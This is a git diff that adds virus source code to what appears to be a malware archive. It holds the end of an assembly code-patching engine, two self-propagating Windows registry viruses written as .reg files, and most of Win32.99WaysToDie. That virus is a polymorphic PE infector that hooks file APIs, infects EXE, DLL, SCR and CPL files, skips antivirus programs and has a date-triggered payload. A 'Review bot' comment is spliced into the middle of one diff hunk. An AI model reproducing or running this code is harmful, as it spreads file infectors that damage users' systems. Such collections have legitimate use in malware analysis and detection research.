íà÷àëà + ; êîäà è äîáàâëÿåì + add edi,eax ; òî÷êó âõîäà + lodsd ; Çàãðóæàåì â eax êîë-âî + mov ecx,eax ; áàéò è êëàä¸ì èõ â ecx + rep movsb ; Ïåðåìåùàåì îðèãèíàëüíûå + ; áàéòû íà ñòàðîå ìåñòî + inc edx ; Ïåðåõîäèì ê ñëåäóþùåìó + cmp edx,[ebp+n_spots] ; ïÿòíó + jl not_enough ; åñëè íå âñå ïÿòíà âåðíóëè, + ; òî âîññòàíàâëèâàåì äàëüøå +quit: ; + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; LENGTH SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +length1: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; äëèí ìóñîðíûõ èíñòðóêöèé + mov eax,20 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + test eax,eax ; â äèàïàçîíå 1..19 + jz length1 ; + + mov 
[ebp+num1],eax ; Ñîõðàíÿåì åãî â ïåðåìåííóþ +rand2: + mov eax,20 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + test eax,eax ; â äèàïàçîíå 1..19 + jz rand2 ; + + mov [ebp+num2],eax ; Ñîõðàíÿåì åãî â âòîðóþ + ; ïåðåìåííóþ + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; RESET SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +reset: + ; Ïîäïðîãðàììà èíèöèàëèçàöèè + ; ïåðåìåííûõ + mov edi,[ebp+start_code] ; + ; + push esi ; Èíèöèàëèçèðóåì ïåðåìåííûå + lea esi,[ebp+rest_bytes] ; + mov [ebp+pointer],esi ; + pop esi ; + + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOT JUMP LENGTH GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; LENGTH OF SPOT JUMP -> EAX ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +len_sp_jmp: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; äëèíû ïðûæêà + + mov eax,150 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + cmp eax,45 ; â äèàïàçîíå 45..149 + jle len_sp_jmp ; + + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS NUMBER GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +num_spots: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; êîëè÷åñòâà ïÿòåí + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov eax,40 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + call brandom32 ; â äèàïàçîíå 1..40 + inc eax ; È ñîõðàíÿåì åãî â + mov [ebp+n_spots],eax ; ïåðåìåííîé + + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; TESTING SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; CARRY FLAG ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +testing: + ; Ïîäïðîãðàììà ïðîâåðêè + ; ïîïàäåíèÿ â ãðàíèöó ñåêöèè + + push edi eax ; Ñîõðàíÿåì edi eax â ñòýêå + + add edi,[ebp+num1] ; Äîáàâèì ê edi 1-óþ äëèíó + ; ìóñîðíûõ èíñòðóêöèé + add edi,[ebp+num2] ; Ïîñëå ýòîãî äîáàâèì 2-óþ + add edi,300 ; È äîáàâèì ÷èñëî â êîòîðîå + ; âõîäèò ìàêñèìàëüíûé ðàçìåð + ; ïÿòíà + äëèíà åãî ïðûæêà + mov eax,[ebp+size_for_spot] ;  eax çàãðóçèì ðàçìåð + ; ìåñòà äëÿ ïÿòåí è ñìåùåíèå + add eax,[ebp+start_code] ; â ïàìÿòè òî÷êè âõîäà + + cmp edi,eax ; Ñðàâíèì eax è edi + clc ; Ñáðîñèì carry ôëàã + jl m_space ; Åñëè edi ìåíüøå, òî âñå + ; õîðîøî + mov [ebp+n_spots],ecx ; Åñëè íåò, òî ìû óìåíüøàåì + inc [ebp+n_spots] ; êîëè÷åñòâî ïÿòåí è + stc ; óñòàíàâëèâàåì carry ôëàã +m_space: + pop eax edi ; Âûíèìàåì eax è edi + ret ; Âîçâðàò èç ïðîöåäóðû +;------------------------------------------------------------------------------; +pointer dd 0 ; +n_spots dd 0 ; + ; +num1 dd 0 ; +num2 dd 0 ; + ; Äàííûå íåîáõîäèìûå äëÿ +PE_header dd 0 ; ðàáîòû ìîòîðà +old_eip dd 0 ; +image_base dd 0 ; +start_code dd 0 ; +new_eip dd 0 ; +map_address dd 0 ; +size_for_spot dd 0 ; +rest_bytes: db 2100 dup (?) 
;
+;------------------------------------------------------------------------------;
diff --git a/Win32/Virus.WinREG.Antireg.b b/Win32/Virus.WinREG.Antireg.b
new file mode 100644
index 00000000..02fe7cfd
--- /dev/null
+++ b/Win32/Virus.WinREG.Antireg.b
@@ -0,0 +1,13 @@
+REGEDIT4
+
+;;-------------------------------;;
+;; ;;
+;; AntiREG (The First REG Virus) ;;
+;; Coded By Lys Kovick ;;
+;; Special Thanks To Phage ;;
+;; ;;
+;;-------------------------------;;
+
+[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
+@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
+
diff --git a/Win32/Virus.WinREG.Sptohell b/Win32/Virus.WinREG.Sptohell
new file mode 100644
index 00000000..c7b96c44
--- /dev/null
+++ b/Win32/Virus.WinREG.Sptohell
@@ -0,0 +1,24 @@
+REGEDIT 4
+
+;; WinREG.Wow
+;; written by SeCoNd PaRt To HeLl
+;; for my Virus Database
+
+[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
+@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
+
+;; Wow
+;; WowWow
+;; WowWowWow
+;; WowWowWowWow
+;; WowWowWowWowWow
+;; WowWowWowWowWowWow
+;; WowWowWowWowWowWowWow
+;; WowWowWowWowWowWowWowWow
+;; WowWowWowWowWowWowWow
+;; WowWowWowWowWowWow
+;; WowWowWowWowWow
+;; WowWowWowWow
+;; WowWowWow
+;; WowWow
+;; Wow
\ No newline at end of file
diff --git a/Win32/Virus.WinREG.Sptohell.b b/Win32/Virus.WinREG.Sptohell.b
new file mode 100644
index 00000000..c2fca8c0
--- /dev/null
+++ b/Win32/Virus.WinREG.Sptohell.b
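Review bot: The section-attribute update in find_code, `or [esi + 24h],00000020h or 20000000h or 80000000h`, is the one place this engine changes the PE header beyond the entry point, yet its only explanation is a mis-encoded Russian comment, so a reader cannot tell that it makes the code section writable as well as executable. A comment naming the bits would make that explicit, e.g. `; Characteristics |= IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE; restore writes the saved bytes back into this section at run time, so it must be writable`. The same problem affects every per-line comment in the file: the text appears to be CP1251 Cyrillic rendered as Latin-1, which leaves the author's documentation unreadable as committed; converting the file to UTF-8 on import, or noting the original code page in the header, would preserve it for analysts.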
@@ -0,0 +1,14 @@ +REGEDIT 4 + +;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- *************** +;; +;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus +;; in any ezine before. And I think, much ppl don't know, that such viruses exist. +;; +;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every +;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies +;; itself (the code in the registry) to these .REG-files. + + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" \ No newline at end of file diff --git a/Win32/Win32.99WaysToDie.asm b/Win32/Win32.99WaysToDie.asm new file mode 100644 index 00000000..e7725714 --- /dev/null +++ b/Win32/Win32.99WaysToDie.asm 
@@ -0,0 +1,1886 @@ + +; +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; 99 Ways To Die ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; Coded by Bumblebee/29a ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ +; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Words from the author ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +; . It could seem like a remake of Win32.RainSong. But i feel it's a +; quite new virus. I ever try to re-use some 'well coded' piezes of +; code, so this virus has little parts of RainSong, AOC, ... +; . I hope you'll find it interesting, even if you've seen my previous +; viruses yet due it infects dinamic link libraries and executables. +; . The name this time is due a kewl song by Megadeth. 99 Ways to die! +; +; ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Disclaimer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ +; . This is the source code of a VIRUS. The author is not responsabile +; of any damage that may occur due to the assembly of this file. Use +; it at your own risk. Cuidadiiin! +; +; ÚÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Features ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÙ +; . Win32 per-process resident PE infector. +; . Infects 10 files per time from current and windows folders. +; . Infection increasing last section. +; . Uses EPO tech. If it cannot apply EPO, it doesn't infect. This makes +; the virus more hard to detect, but infection ratio falls a bit... +; . Uses variable encryption with polymorphism and variable key slide. +; . Size padding as infection sign. Also avoids to infect files with +; CERW attributes in last section (i assume they're infected yet). +; Marks files that are not adequate to be infected. +; . Updates PE header checksum after infection. +; . Hooks: +; CreateFileA +; MoveFileA +; CopyFileA +; CreateProcessA +; SetFileAttributesA +; GetFileAttributesA +; SearchPathA +; SetCurrentDirectoryA +; . Gets KERNEL32.DLL address using SEH and searches for Win9x, WinNt +; and Win2k. +; . 
Uses CRC32 instead of names to get needed APIs. +; . Self integrity check using CRC32. This is easy to implement and +; quite effective way to make debug harder. +; . Infects PE files with extension: EXE SCR CPL DLL. +; . Takes care of the relocations (it infects DLL). +; . Avoids infect most used av (only in runtime part). +; . Has active payload about a year after infection. Payload remains +; active a whole month. At this month hooked API will not work. This +; is not as 'terrible' as it seems. User can change the date... +; I know avers are going to say '...it's a dangerous...' shit. +; +; There are other interesting things, but i think is better you take a +; look to the comments inside the code. Moreover in 29#5 there is a +; little article about considerations while infecting DLL. +; +; I realy need a break... no more virus coding for some months. I hope +; you'll find nice this release. I have an idea about a nice tech... +; +; +; The way of the bee +; +.486p +locals +.model flat,STDCALL + + extrn ExitProcess:PROC ; needed for 1st generation + extrn MessageBoxA:PROC + +; +; Some macros and equs +; + +@strz macro string + jmp @@a +@@b: + db string,0 +@@a: + push offset @@b +endm + +; Notice this could work only in my system due the harcoded address of +; MessageBoxA, but this is only for debug in my comp ;) +@debug macro title,reg + pushad + push 1000h +@@tit: @strz title + pop eax + add eax,ebp + push eax + push reg + push 0h + mov eax,0bff5412eh + call eax + popad +endm + +@hook macro ApiAddress + lea eax,ApiAddress + jmp generalHook +endm + +vSize equ vEnd-vBegin +PADDING equ 101 +STRINGTOP equ 160 +crptSize equ vSize-5 + +; from BC++ Win32 API on-line Reference +WIN32_FIND_DATA struc +dwFileAttributes dd 0 +dwLowDateTime0 dd ? ; creation +dwHigDateTime0 dd ? +dwLowDateTime1 dd ? ; last access +dwHigDateTime1 dd ? +dwLowDateTime2 dd ? ; last write +dwHigDateTime2 dd ? +nFileSizeHigh dd ? +nFileSizeLow dd ? 
+dwReserved dd 0,0 +cFileName db 260 dup(0) +cAlternateFilename db 14 dup(0) + db 2 dup(0) +WIN32_FIND_DATA ends + + +.DATA + ; dummy data + db 'WARNING - This is a virus carrier - WARNING' + +.CODE +inicio: ; now i've realized i ever + ; put this label in spanish! + pushad + call getDelta + + lea esi,vBegin+ebp ; setup CRC32 for 1st + mov edi,vSize-4 ; generation + call CRC32 + mov dword ptr [myCRC32+ebp],eax + + xor dword ptr [hostRET+ebp],eax ; hide hostEP + popad + +; +; 99Ways begins here! +; +vBegin label byte + call crypt ; decrypt + + ; here starts encrypted data -> vBegin + 5 + pushad + + ; get delta offset + call getDelta + + mov eax,dword ptr [myCRC32+ebp] ; restore hostEP + xor dword ptr [hostRET+ebp],eax ; before CRC32 + + lea esi,vBegin+ebp ; integrity check + mov edi,vSize-4 ; using CRC32 + call CRC32 + + cmp eax,dword ptr [myCRC32+ebp] + je skipFakeProcess + + cli + call $ ; this will fake the proc + +skipFakeProcess: + mov esi,dword ptr [kernel32+ebp] ; test last used + call GetKernel32 + jnc getAPIsNow + + mov esi,077f00000h ; test for winNt + call GetKernel32 + jnc getAPIsNow + + mov esi,077e00000h ; test for win2k + call GetKernel32 + jnc getAPIsNow + + mov esi,0bff70000h ; test for win9x + call GetKernel32 + jc returnHost + +getAPIsNow: + ; now get APIs using CRC32 + mov edi,0bff70000h ; coded using win9x +kernel32 equ $-4 + ; ^ this is a nice way to optimize code and hide data, + ; almost all the non-temporary data can be plazed inside code! 
+ mov esi,edi + mov esi,dword ptr [esi+3ch] + add esi,edi + mov esi,dword ptr [esi+78h] + add esi,edi + add esi,1ch + + lodsd + add eax,edi + mov dword ptr [address+ebp],eax + lodsd + add eax,edi + mov dword ptr [names+ebp],eax + lodsd + add eax,edi + mov dword ptr [ordinals+ebp],eax + + sub esi,16 + lodsd + mov dword ptr [nexports+ebp],eax + + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea eax,FSTAPI+ebp + +searchl: + mov esi,dword ptr [names+ebp] + add esi,edx + mov esi,dword ptr [esi] + add esi,edi + push eax edx edi + xor edi,edi + movzx di,byte ptr [eax+4] + call CRC32 + xchg ebx,eax + pop edi edx eax + cmp ebx,dword ptr [eax] + je fFound + add edx,4 + inc dword ptr [expcount+ebp] + push edx + mov edx,dword ptr [expcount+ebp] + cmp dword ptr [nexports+ebp],edx + pop edx + je returnHost + jmp searchl +fFound: + shr edx,1 + add edx,dword ptr [ordinals+ebp] + xor ebx,ebx + mov bx,word ptr [edx] + shl ebx,2 + add ebx,dword ptr [address+ebp] + mov ecx,dword ptr [ebx] + add ecx,edi + + mov dword ptr [eax+5],ecx + add eax,9 + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea ecx,ENDAPI+ebp + cmp eax,ecx + jb searchl + + ; make a copy of virus in memory and work there + push 00000040h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz returnHost + + lea edi,vBegin+ebp + sub edi,dword ptr [virusEP+ebp] + add dword ptr [imageBase+ebp],edi ; fix relocations + ; in the hook routine + lea esi,vBegin+ebp + mov edi,eax + mov ecx,vSize + rep movsb + + ; patch file loaded copy + call patchVirusBody + + ; jmp into memory copy - put into edi the return address + ; for the memory copy + lea edi,vBegin+ebp + add eax,offset memCopy-offset vBegin + push eax + ret + +memCopy: + ; get delta offset another time for memory copy + call getDelta + ; setup the ret to jmp patched virus copy + mov dword ptr [retPatch+ebp],edi + + mov byte ptr [payload+ebp],0 + + lea edx,dateTime+ebp + push edx + call dword ptr 
[_GetSystemTime+ebp] + + lea edx,dateTime+ebp + mov ax,word ptr [edx+2] + mov bx,-1 +countdown equ $-2 + ; another time + cmp bx,ax ; the day arrived? + jne skipPay + + mov byte ptr [payload+ebp],1 + +skipPay: + ; alloc a temporary buffer to generate the poly sample + ; of the virus ready to infect + push 00000004h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz quitFromMem + + mov dword ptr [memHnd+ebp],eax + + ; the same polymorphic routine is used for each infection + ; in the current execution of the virus + call dword ptr [_GetTickCount+ebp] + mov edi,dword ptr [memHnd+ebp] + add edi,vSize + mov ecx,(crptSize/4)-(4-(crptSize MOD 4)) + call GenDCrpt + ; store the size of the sample (for infection process) + add eax,vSize + mov dword ptr [gensize+ebp],eax + + ; Hook the API to get per-process residency + ; Notice this must be called before any infection + call hookApi + + ; set infection counter to 10 + mov byte ptr [infCount+ebp],10 + call infectDir ; infect current + + cmp byte ptr [infCount+ebp],0 ; better performance + je quitFromMem + + lea esi,currentPath+ebp ; get current directory + push esi + push STRINGTOP + call dword ptr [_GetCurrentDirectoryA+ebp] + or eax,eax + jz quitFromMem + + push STRINGTOP ; get windows directory + lea esi,tmpPath+ebp + push esi + call dword ptr [_GetWindowsDirectoryA+ebp] + or eax,eax + jz quitFromMem + + lea esi,tmpPath+ebp ; goto windows directory + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + or eax,eax + jz quitFromMem + + call infectDir ; infect windows folder + + lea esi,currentPath+ebp ; go back home + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + + ; this is the way to return host + ; from the memory copy + jmp quitFromMem + +returnHost: + + ; patch virus + call patchVirusBody + +quitFromMem: + popad + push 1234568h +retPatch equ $-4 + ret + +; i know this way to go back to host it's a bit weird but +; supports relocations (for 
DLL) and patches the virus +; to avoid be called more than once and ... +patchVirusBody: + lea edi,vBegin+ebp + mov dword ptr [retPatch+ebp],edi + mov byte ptr [edi],0e9h + mov esi,offset fakeHost +hostRET equ $-4 + ; hehe + mov edx,edi + sub edx,offset vBegin +virusEP equ $-4 + ; hehehe + add esi,edx + sub esi,5 + sub esi,edi + mov dword ptr [edi+1],esi + ret +; +; Returns Delta offset into ebp. +; +getDelta: + call delta +delta: + pop ebp + sub ebp,offset delta + ret +; +; Gets KERNEL32.DLL address in memory. +; +GetKernel32: + pushad + xor edx,edx + lea eax,dword ptr [esp-8h] + xchg eax,dword ptr fs:[edx] + lea edi,GetKernel32Exception+ebp + push edi + push eax + + cmp word ptr [esi],'ZM' + jne GetKernel32NotFound + mov dx,word ptr [esi+3ch] + cmp esi,dword ptr [esi+edx+34h] + jne GetKernel32NotFound + mov dword ptr [kernel32+ebp],esi + + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + clc + ret + +GetKernel32Exception: + xor edi,edi + mov eax,dword ptr fs:[edi] + mov esp,dword ptr [eax] +GetKernel32NotFound: + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + stc + ret +; +; This routine makes CRC32. +; +CRC32: + cld + xor ecx,ecx + dec ecx + mov edx,ecx + push ebx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: + dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi + jnz NextByteCRC + pop ebx + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret +; +; This routine hooks the APIs that gives virus residency. +; Takes care of relocations. 
+; +hookApi: + pushad + ; init the sem to free + mov byte ptr [semHook+ebp],0 + mov edx,400000h +imageBase equ $-4 + ; ;) + cmp word ptr [edx],'ZM' + jne noHook + mov edi,edx + add edi,dword ptr [edx+3ch] + cmp word ptr [edi],'EP' + jne noHook + mov edi,dword ptr [edi+80h] ; RVA import + or edi,edi + jz noHook + add edi,edx +searchK32Imp: + mov esi,dword ptr [edi+0ch] ; get name + or esi,esi + jz noHook + add esi,edx + push edi ; save (stringUp doesn't) + call stringUp + pop edi + jc nextName + lea esi,stringBuffer+ebp + cmp dword ptr [esi],'NREK' ; look for Kernel32 module + jne nextName + cmp dword ptr [esi+4],'23LE' + je k32ImpFound +nextName: + add edi,14h + mov esi,dword ptr [edi] + or esi,esi + jz noHook + jmp searchK32Imp +k32ImpFound: + mov esi,dword ptr [edi+10h] ; get address table + or esi,esi + jz noHook + add esi,edx + lea ecx,HOOKTABLEEND+ebp +nextImp: ; search for APIs + lea edx,HOOKTABLEBEGIN+ebp + lodsd + or eax,eax + jz noHook +checkNextAPI: + mov edi,dword ptr [edx] + cmp eax,dword ptr [edi+ebp] + je doHook + add edx,8 + cmp edx,ecx + jne checkNextAPI + jmp nextImp +doHook: + mov eax,dword ptr [edx+4] + add eax,ebp + mov dword ptr [esi-4],eax + add edx,8 + cmp edx,ecx + jne nextImp +noHook: + popad + ret +; +; Changes to upper case the string by esi storing into stringBuffer. +; Sets carry flag if our string buffer is small. Returns in edi the +; end of the string into the buffer. +; +stringUp: + push esi eax + lea edi,stringBuffer+ebp + mov eax,edi + add eax,STRINGTOP +stringUpLoop: + cmp eax,edi + jne continueStringUp + stc + jmp stringUpOut +continueStringUp: + movsb + cmp byte ptr [esi-1],'a' + jb skipThisChar + cmp byte ptr [esi-1],'z' + ja skipThisChar + add byte ptr [edi-1],'A'-'a' +skipThisChar: + cmp byte ptr [esi-1],0 + jne stringUpLoop + dec edi + clc +stringUpOut: + pop eax esi + ret +; +; The hooks. 
+; +Hook0: + @hook _CreateFileA +Hook1: + @hook _MoveFileA +Hook2: + @hook _CopyFileA +Hook3: + @hook _CreateProcessA +Hook4: + @hook _SetFileAttributesA +Hook5: + @hook _GetFileAttributesA +Hook6: + @hook _SearchPathA +Hook7: + @hook _SetCurrentDirectoryA +; +; This is the general hook that provides per-process residency. +; +generalHook: + push eax + pushad + pushfd + cld + + ; get delta offset + call getDelta + ; setup the return hook + mov eax,dword ptr [eax+ebp] + mov dword ptr [esp+24h],eax + + ; check if filename==NULL + mov esi,dword ptr [esp+2ch] + or esi,esi + jz leaveHook + + ; check semaphore + cmp byte ptr [semHook+ebp],0 + jne leaveHook + + mov byte ptr [semHook+ebp],1 + + cmp byte ptr [payload+ebp],0 + je skipPayloadEffect + + ; in the date of activation all hooked APIs will fail + xor eax,eax + mov dword ptr [esp+2ch],eax + jmp hookInfectionFail + +skipPayloadEffect: + call stringUp + jc hookInfectionFail + + push edi ; test the string it's + sub edi,esi ; long enought + cmp edi,5 + pop edi + jna hookInfectionFail + + cmp dword ptr [edi-4],'EXE.' + je infectThisFile + cmp dword ptr [edi-4],'LLD.' + je infectThisFile + cmp dword ptr [edi-4],'LPC.' + je infectThisFile + cmp dword ptr [edi-4],'RCS.' + jne hookInfectionFail + +infectThisFile: + lea esi,stringBuffer+ebp ; erm... here could touch + call infect ; any av! + +hookInfectionFail: + mov byte ptr [semHook+ebp],0 +leaveHook: + popfd + popad + ret +; +; Infects PE files in current directory. It affects EXE, SCR, CPL and DLL +; extensions. +; +infectDir: + pushad + + lea esi,find_data+ebp + push esi + lea esi,fndMask+ebp + push esi + call dword ptr [_FindFirstFileA+ebp] + inc eax + jz notFound + dec eax + + mov dword ptr [findHnd+ebp],eax + +findNext: + lea esi,find_data.cFileName+ebp + call stringUp + lea esi,stringBuffer+ebp + push edi ; test the string it's + sub edi,esi ; long enought + cmp edi,5 + pop edi + jna skipThisFile + cmp dword ptr [edi-4],'EXE.' 
+ je validFileExt + cmp dword ptr [edi-4],'LLD.' + je validFileExt + cmp dword ptr [edi-4],'LPC.' + je validFileExt + cmp dword ptr [edi-4],'RCS.' + jne skipThisFile + +validFileExt: + mov eax,dword ptr [find_data.nFileSizeLow+ebp] + cmp eax,8000h + jb skipThisFile ; at least 8000h bytes? + mov ecx,PADDING ; test if it's infected + xor edx,edx ; yet + div ecx + or edx,edx ; reminder is zero? + jz skipThisFile + +testIfAv: ; let's search for strings + ; that may appear in av progs + lea edi,avStrings+ebp + mov ecx,vStringsCout +testIfAvL: + push esi + mov ax,word ptr [edi] +testAvLoop: + cmp word ptr [esi],ax + jne contTestLoop + pop esi + jmp skipThisFile +contTestLoop: + inc esi + cmp byte ptr [esi+3],0 ; skip the extension + jne testAvLoop + pop esi + add edi,2 + loop testIfAvL + + lea esi,stringBuffer+ebp + call infect + + cmp byte ptr [infCount+ebp],0 ; test 10 infections + je infectionDone + +skipThisFile: + lea esi,find_data+ebp + push esi + push dword ptr [findHnd+ebp] + call dword ptr [_FindNextFileA+ebp] ; Find next file + or eax,eax + jnz findNext + +infectionDone: + push dword ptr [findHnd+ebp] + call dword ptr [_FindClose+ebp] + +notFound: + popad + ret +; +; Infects PE file increasing last section. +; +; ESI: addr of file name of PE to infect. 
+; +infect: + pushad + mov dword ptr [fNameAddr+ebp],esi + + push esi + push esi + call dword ptr [_GetFileAttributesA+ebp] + pop esi + inc eax + jz infectionError + dec eax + + mov dword ptr [fileAttrib+ebp],eax + + push esi + push 00000080h + push esi + call dword ptr [_SetFileAttributesA+ebp] + pop esi + or eax,eax + jz infectionError + + xor eax,eax + push eax + push 00000080h + push 00000003h + push eax + push eax + push 80000000h OR 40000000h + push esi + call dword ptr [_CreateFileA+ebp] + inc eax + jz infectionErrorAttrib + dec eax + + mov dword ptr [fHnd+ebp],eax + + push 0h + push eax + call dword ptr [_GetFileSize+ebp] + inc eax + jz infectionErrorClose + dec eax + + mov dword ptr [fileSize+ebp],eax + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_GetFileTime+ebp] + or eax,eax + jz infectionErrorClose + + xor eax,eax + push eax + push eax + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push eax + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov edi,eax + cmp word ptr [edi],'ZM' + jne infectionErrorCloseUnmap + + cmp word ptr [edi+12h],'(:' ; not valid file? 
